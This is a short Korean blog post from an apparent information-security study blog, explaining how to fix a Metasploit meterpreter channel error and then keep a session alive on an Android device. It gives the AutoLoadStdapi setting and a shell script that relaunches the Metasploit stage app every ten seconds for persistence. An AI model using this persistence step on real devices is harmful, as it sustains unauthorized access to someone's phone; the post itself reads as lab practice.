Notice
Recent Posts
Recent Comments
Link
일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | 3 | 4 | 5 | 6 | 7 |
8 | 9 | 10 | 11 | 12 | 13 | 14 |
15 | 16 | 17 | 18 | 19 | 20 | 21 |
22 | 23 | 24 | 25 | 26 | 27 | 28 |
29 | 30 | 31 |
Tags
- 제어판
- TrueCrypt
- backtrack
- ㅂ
- 예시
- 윈도우볼륨축소
- 윈도우
- mount
- 실습
- 정보보안
- debian
- 윈도우서버
- cybersecurity
- Linux
- 오류
- VPN
- network
- BTr3
- defrag
- redhat
- CentOS
- VMwares
- 마운트
- window
- 네트워크
- DiskQuata
- 볼륨
- 프로젝트
- ipsec
Archives
- Today
- Total
정보 보안을 향한 항해
meta "[-] core_channel_open: Operation failed: 1" 오류 해결 본문
1. 명령어
set AutoLoadStdapi true
2. 연결 후 영구 설정
meterpreter > shell
Process 1 created.
Channel 1 created.
touch persistentscript.sh
echo "#!/bin/sh
while :
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 10
done
" > persistentscript.sh
sh persistentscript.sh